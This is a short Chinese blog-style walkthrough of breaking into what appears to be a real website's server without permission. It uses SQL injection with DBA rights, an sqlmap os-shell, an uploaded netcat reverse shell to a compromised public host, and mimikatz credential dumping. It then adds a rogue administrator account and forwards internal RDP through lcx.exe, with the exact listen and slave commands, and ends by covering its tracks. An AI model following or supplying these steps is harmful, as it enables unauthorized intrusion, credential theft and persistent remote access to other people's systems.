通过注入拿下服务器

 

  首先，碰到了个站。注入漏洞，看一下是不是DBA权限。

 

当前用户是DBA权限，执行os-shell

 

 

 

可以直接执行命令，但是有时候会卡到链接超时，在执行os-shell的过程中有条信息，就是上面打红的地方（忽略掉打码技术），访问该地址它。

 

 

 

能直接上传文件，上传NC，反弹shell(sqlmap里shell实在卡得不行，回显太慢)

 

 

 

上传成功，首先执行NC反弹shell到公网肉鸡里

 

在肉鸡里开启监听，接受到shell。

 

没有公网地址，是内网机子。

 

其次，mimikatz抓管理员密码。

 

 

 

明文密码是抓不到的，抓到了哈希，拿去破解，破不出来。

算了，还是直接添加一个管理员账号吧。

看了一下端口，开了3389.

 

 

 

因为是内网机子，不能直接访问3389端口，这时就需要把内网的端口转发出来了。

用到的工具是lcx.exe

在公网上：lcx.exe -listen 2222 3333（公网监听2222端口，并把监听到的数据传到3333端口）

目标机：lcx.exe -slave xxx.xxx.xxx.xxx 2222 127.0.0.1 3389（把本地的3389端口转发到xxxx：2222公网端口）

 

 

 

 

用刚才添加的用户远程登入。

 

 

 

OK，成功链接。擦屁股走人